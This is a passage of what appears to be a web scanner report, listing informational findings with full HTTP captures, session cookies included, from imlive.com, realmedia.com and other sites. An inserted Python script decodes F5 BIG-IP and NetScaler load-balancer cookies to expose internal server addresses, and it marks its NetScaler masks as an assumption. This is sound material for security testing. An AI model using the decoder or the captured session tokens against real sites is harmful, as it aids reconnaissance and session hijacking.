Vary: Accept-Encoding


<!--include file="help/CustomerServiceEmails.inc"-->

<html>
   <head>
       <title>Public Relations of ImLive Video Chat</title>
       
<link rel="stylesheet" type="text/css" href="http://i1.imlive.com
...[SNIP]...

27.108. http://imlive.com/sex_webcams_index/index.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /sex_webcams_index/index.asp

Request

GET /sex_webcams_index/index.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:23:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:00 GMT
Connection: close
Content-Length: 23768
Vary: Accept-Encoding


<html>
   <head>
       <title>
           Live Sex Chat Categories at ImLive
       </title>
       <meta name="description" content="Live sex chat with girls, lesbians, gays, couples, threesomes and fetish lovers. CO
...[SNIP]...

27.109. http://imlive.com/sitemap.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /sitemap.html

Request

GET /sitemap.html HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:23:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:00 GMT
Connection: close
Content-Length: 33732
Vary: Accept-Encoding


<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...

27.110. http://imlive.com/videosfr.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /videosfr.asp

Request

GET /videosfr.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:11:20 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:21 GMT
Connection: close
Content-Length: 15706
Vary: Accept-Encoding


<html>
   <head>
       <title>Video Chat Recorded on Webcam at ImLive</title>
       <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide
...[SNIP]...

27.111. http://imlive.com/warningms.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://imlive.com
Path:   /warningms.asp

Request

GET /warningms.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:23:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:28 GMT
Connection: close
Content-Length: 14418
Vary: Accept-Encoding


<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...

27.112. http://jqueryui.com/about

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 04:50:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...

27.113. http://jqueryui.com/themeroller/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 04:50:59 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 117007

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...

27.114. http://main.oggifinogi.com/OggiPlayerService/PlayerProxy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://main.oggifinogi.com
Path:   /OggiPlayerService/PlayerProxy.aspx

Request

GET /OggiPlayerService/PlayerProxy.aspx?id=92893396-e0b6-4c83-8a05-c0a43993b46b&campaignId=07b24386-4c5b-4ca7-8b27-6adc092e2aef HTTP/1.1
Host: main.oggifinogi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:59:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-From-Cache: False
Cache-Control: public
Last-Modified: Wed, 17 Nov 2010 19:11:59 GMT
ETag: MjAxMC0xMS0xNyAxOToxMTo1OQ==
Vary: *
Content-Type: text/html
Connection: close
Content-Length: 12002


<html xmlns="http://www.w3.org/1999/xhtml">
<head id="PlayerHead"><title>
   Player
</title>
<style type="text/css">
.hand {cursor:pointer}
</style>
<!--[if IE]>
<sty
...[SNIP]...

27.115. http://mig.nexac.com/2/B3DM/DLX/1@x96

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Request

GET /2/B3DM/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW800+KPMAAfCd

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1391
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}

if((cookie_check(
...[SNIP]...
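
Added example (not part of the crawler report): a decoder for the two load-balancer persistence cookies that recur in these captures, BIGipServerImlive (F5 BIG-IP) and the NSC_* cookies (Citrix NetScaler). Both encode the address and port of the pool member that served the request, so a client that receives them learns back-end addressing the front end is meant to hide; decoding them is the check a tester would run on these captures. The BIG-IP layout is F5's documented default (address and port as little-endian integers). The NetScaler XOR masks are the ones published in public NetScaler cookie decoders and are taken as an assumption here; sanity-check the output, since a correct decode normally yields an RFC 1918 address and a low port such as 80. The cookie values in the sample are copied from the requests above; the shortened headers they sit in are constructed.

```python
import re
import struct
from typing import Dict, Optional, Tuple

# Assumption: XOR masks as published in public NetScaler cookie decoders.
NETSCALER_IP_MASK = 0x03081E67
NETSCALER_PORT_MASK = 0x3630


def decode_bigip(value: str) -> Optional[Tuple[str, int]]:
    """Decode a BIGipServer* cookie in F5's default "<ip>.<port>.0000" form.

    Both numbers are the raw address/port bytes read as little-endian
    integers, so 20480 (0x5000) is port 80.  Returns (ip, port) or None.
    """
    m = re.fullmatch(r"(\d+)\.(\d+)\.0000", value)
    if not m:
        return None
    ip_le, port_le = int(m.group(1)), int(m.group(2))
    if ip_le > 0xFFFFFFFF or port_le > 0xFFFF:
        return None
    # Packing little-endian restores the bytes in dotted-quad order.
    ip = ".".join(str(b) for b in struct.pack("<I", ip_le))
    port = struct.unpack(">H", struct.pack("<H", port_le))[0]
    return ip, port


def decode_netscaler(value: str) -> Optional[Tuple[str, int]]:
    """Decode an NSC_* cookie: "ffffffff" + masked IPv4 (8 hex) +
    24 hex of per-session data + masked port (4 hex).
    Returns (ip, port) or None when the value does not have that shape."""
    m = re.fullmatch(r"ffffffff([0-9a-f]{8})[0-9a-f]{24}([0-9a-f]{4})",
                     value.lower())
    if not m:
        return None
    ip_int = int(m.group(1), 16) ^ NETSCALER_IP_MASK
    port = int(m.group(2), 16) ^ NETSCALER_PORT_MASK
    ip = ".".join(str(b) for b in ip_int.to_bytes(4, "big"))
    return ip, port


def persistence_cookies(header_value: str) -> Dict[str, Tuple[str, int]]:
    """Scan a Cookie: or Set-Cookie: header value and return
    {cookie_name: (ip, port)} for every persistence cookie it can decode.
    Attributes such as "path=/" are skipped because their names match
    neither prefix."""
    found: Dict[str, Tuple[str, int]] = {}
    for part in header_value.split(";"):
        if "=" not in part:
            continue
        name, value = part.strip().split("=", 1)
        if name.startswith("BIGipServer"):
            decoded = decode_bigip(value)
        elif name.startswith("NSC_"):
            decoded = decode_netscaler(value)
        else:
            continue
        if decoded is not None:
            found[name] = decoded
    return found


if __name__ == "__main__":
    # Constructed sample headers carrying the persistence cookie values
    # seen in the captures above; unrelated cookies are left out.
    samples = [
        "BIGipServerImlive=2434008642.20480.0000; ix=k",
        "BIGipServerImlive=2417231426.20480.0000; ix=s",
        "NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660;path=/",
    ]
    for header in samples:
        for name, (ip, port) in persistence_cookies(header).items():
            print(f"{name}: pool member {ip}:{port}")
```

Run it against any Cookie: or Set-Cookie: header value; two BIGipServerImlive values appearing in these captures is what you would expect from a two-member pool, and the NSC_ cookies differ only in the masked address bytes. A value whose decode is not a plausible pool address (port 0, an address that cannot belong to the target) usually means the appliance uses a non-default or encrypted cookie format, not that the check is wrong.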

27.116. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/122237937@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O1012Mr|O3016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:07 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:09 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

27.117. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/243052316@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:31:22 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|OA016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:22:24 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

27.118. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/311285161@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:27:15 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0945525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:18:17 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

27.119. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/438702563@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O8016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:23:08 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O8016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 573
Content-Type: text/html
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:14:10 GMT;path=/

<SCRIPT TYPE="text/javascript" language="JavaScript">
var mm247d=new Date();
var mm247m=mm247d.getTime();
mm247d.setTime(mm247m+3000*24*60*60*1000);
var mmarray = new Array("AL","LE","AS","SE","CA
...[SNIP]...

27.120. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3

Request

GET /RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/509694158@Bottom3?_RM_HTML_MM_=101155000010000511001 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
